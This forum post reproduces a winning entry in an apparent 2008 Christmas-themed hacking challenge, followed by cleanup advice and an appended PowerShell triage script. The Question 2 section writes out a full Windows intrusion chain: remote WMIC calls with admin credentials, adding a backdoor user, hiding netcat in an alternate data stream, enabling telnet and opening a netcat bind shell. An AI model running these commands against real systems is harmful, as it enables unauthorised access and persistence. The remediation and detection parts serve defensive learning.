Author Topic: Skillz Dec 07 Winning Entry - Technical  (Read 8336 times)
don
Editor-In-Chief
« on: April 02, 2008, 12:31:35 PM »

Icetek

Quote

Melting? Not so fun..
A lesson Frost has learnt well
Secure is cool, yeah!!

Author: icetek  ~  circa 2008


## QUESTION 1 ##

# Frostinator's temp check script: great idea; however, I found issues with it at two levels. First, when tested on my XP boxes I received the "Not Supported" response. This was likely due to the hardware I was testing on, though. Secondly, and more importantly, for the boxes I did get it to work on, the WMI interface would not update the temperature while it was running. The temp will display every 15 seconds but never refreshes until the system is rebooted. A utility that uses kernel mode drivers would have helped Frosty to get a constantly refreshing display. I found this out the hard way by testing on one of my systems when the temperature never deviated from 3132 kelvin, even though it was heating up all of the time.

C:\> wmic /namespace:\\root\wmi PATH MSAcpi_ThermalZoneTemperature get CurrentTemperature /every:15

## QUESTION 2 ##

# Mr. Magician's load check script. This script, which is available on the evil magician's XP box, is used to read information about the chosen computer (Frosty's). In this case, Mr. Magician is remotely obtaining the load percentage to find out when Frosty's load starts jumping. This does update properly!

C:\> wmic /node:icebox /user:administrator /password:happybirthday cpu get loadpercentage /every:15

# Now Mr. Magician is adding his own user "merry" with a password of "christmas", which he will log in with later.

C:\> wmic /node:icebox /user:administrator /password:happybirthday process call create "cmd.exe /c net user merry christmas /add"

# Mr. Magician giving merry privileges on icebox's c$ share

C:\> net use * \\icebox\c$ christmas /u:merry

# Ingeniously, we're utilizing Alternate Data Streams (ADS) to hide netcat on the remote system within another file. This will not change the target file size and may or may not alter the file date.

C:\> type c:\nc.exe > z:\windows\system32\wbem\wmic.exe:windows.exe

# Now we enable the telnet server on the remote system and make it start automatically from now on.

C:\> wmic /node:icebox /user:administrator /password:happybirthday service where name="TlntSvr" call changestartmode "automatic"

# Now he starts the telnet service

C:\> wmic /node:icebox /user:administrator /password:happybirthday service where name="TlntSvr" call startservice

# Time to log evil merry in...

C:\> telnet icebox
Login: merry
Password: *********

# OK, now we've started the hidden netcat binary without DNS resolution, using UDP, listening on port 2222 to execute a command prompt on connection.

C:\Documents and Settings\merry> wmic process call create "c:\windows\system32\wbem\wmic.exe:windows.exe -n -u -l -p 2222 -e cmd.exe"

# Enter the melting command in a cryptic manner

C:\> nc -u icebox 2222

<long maniacal screed>

# Since the command interpreter only grabs the first character at the beginning of each line and interprets spaces at the beginning of lines, the command ends up looking something like this:

FOR /L %I IN (1,0,2) DO @ECHO MELT

And Frosty begins his long, hot, painful melt of looping echoes... :-(

## QUESTION 3 ##

As far as getting back down to comfort levels quickly, probably the quickest way to expel Mr. Magician is to disconnect his system from the internet initially, to prevent Mr. Magician from telnetting back in to do further damage.

Next, Frost needs to quickly kill the shell that is doing the @ECHO command. Rebooting the box or killing the cmd.exe process *if the box is responsive* should work.

On boot-up or after killing cmd.exe he needs to go into the services and disable the telnet server service and set it to not start automatically.

The streamed file can be "unstreamed" by copying it back to *itself*: "copy c:\windows\system32\wbem\wmic.exe:windows.exe c:\nc.exe". He might want to remove netcat as well. A good virus scan / rootkit remover and firewall would have probably helped in detecting and possibly preventing the streamed file.

Finally, and *MOST* importantly, he needs to remove the "merry" user and update all of his passwords to passphrases with high complexity so that he'll never lose his cool again!

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

~icetek


Posted by Don
CISSP, MCSE, CSTA, Security+ SME
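An added triage script for the Question 3 cleanup, written for this page and not part of icetek's entry or the EH-Net challenge. It assumes Windows PowerShell 5.1 running as an administrator on the affected box; the wbem directory, the "merry" account, the TlntSvr service and UDP port 2222 are taken from the write-up above, everything else is a constructed default.

```powershell
# Triage for the Question 3 cleanup: surface the hidden stream, the
# listener, the telnet service and the rogue account before removing them.
# Assumes Windows PowerShell 5.1 run as administrator (not the page's code).
param(
    [string]$ScanRoot    = "$env:SystemRoot\System32\wbem",
    [string]$SuspectUser = 'merry',
    [string]$ServiceName = 'TlntSvr',
    [int]   $SuspectPort = 2222
)

Write-Host "== Non-default alternate data streams under $ScanRoot =="
Get-ChildItem -Path $ScanRoot -File -Recurse -ErrorAction SilentlyContinue |
    Get-Item -Stream * -ErrorAction SilentlyContinue |
    Where-Object { $_.Stream -ne ':$DATA' } |
    ForEach-Object {
        # Every file has a ':$DATA' stream; anything else is unusual, and a
        # stream that starts with "MZ" is a PE image hiding behind the host file.
        $magic = Get-Content -Path $_.FileName -Stream $_.Stream `
                             -Encoding Byte -TotalCount 2 -ErrorAction SilentlyContinue
        [pscustomobject]@{
            Stream      = "$($_.FileName):$($_.Stream)"
            Bytes       = $_.Length
            LooksLikePE = ($magic.Count -eq 2 -and $magic[0] -eq 0x4D -and $magic[1] -eq 0x5A)
        }
    } | Format-Table -AutoSize

Write-Host "== Processes whose command line references a stream (file.ext:stream) =="
# The pattern also matches host:port strings, so review the hits by hand.
Get-CimInstance Win32_Process |
    Where-Object { $_.CommandLine -match '\.\w+:[^\\/:\s"]+' } |
    Select-Object ProcessId, ParentProcessId, CommandLine | Format-Table -Wrap

Write-Host "== UDP listeners on port $SuspectPort =="
Get-NetUDPEndpoint -LocalPort $SuspectPort -ErrorAction SilentlyContinue |
    Select-Object LocalAddress, LocalPort, OwningProcess

Write-Host "== Telnet service and suspect account =="
Get-CimInstance Win32_Service -Filter "Name='$ServiceName'" |
    Select-Object Name, State, StartMode
Get-CimInstance Win32_UserAccount -Filter "LocalAccount=True AND Name='$SuspectUser'" |
    Select-Object Name, SID, Disabled

# Remediation in the order the write-up gives: stop and disable the telnet
# service, then remove the account. Kill the listener's OwningProcess from
# the table above and recover the stream's host file with the "copy back" trick.
Stop-Service -Name $ServiceName -Force -ErrorAction SilentlyContinue
Set-Service  -Name $ServiceName -StartupType Disabled -ErrorAction SilentlyContinue
net user $SuspectUser /delete
```

Run it once with the network cable pulled, as the write-up advises, and again after reboot to confirm the service stays disabled and no stream reappears.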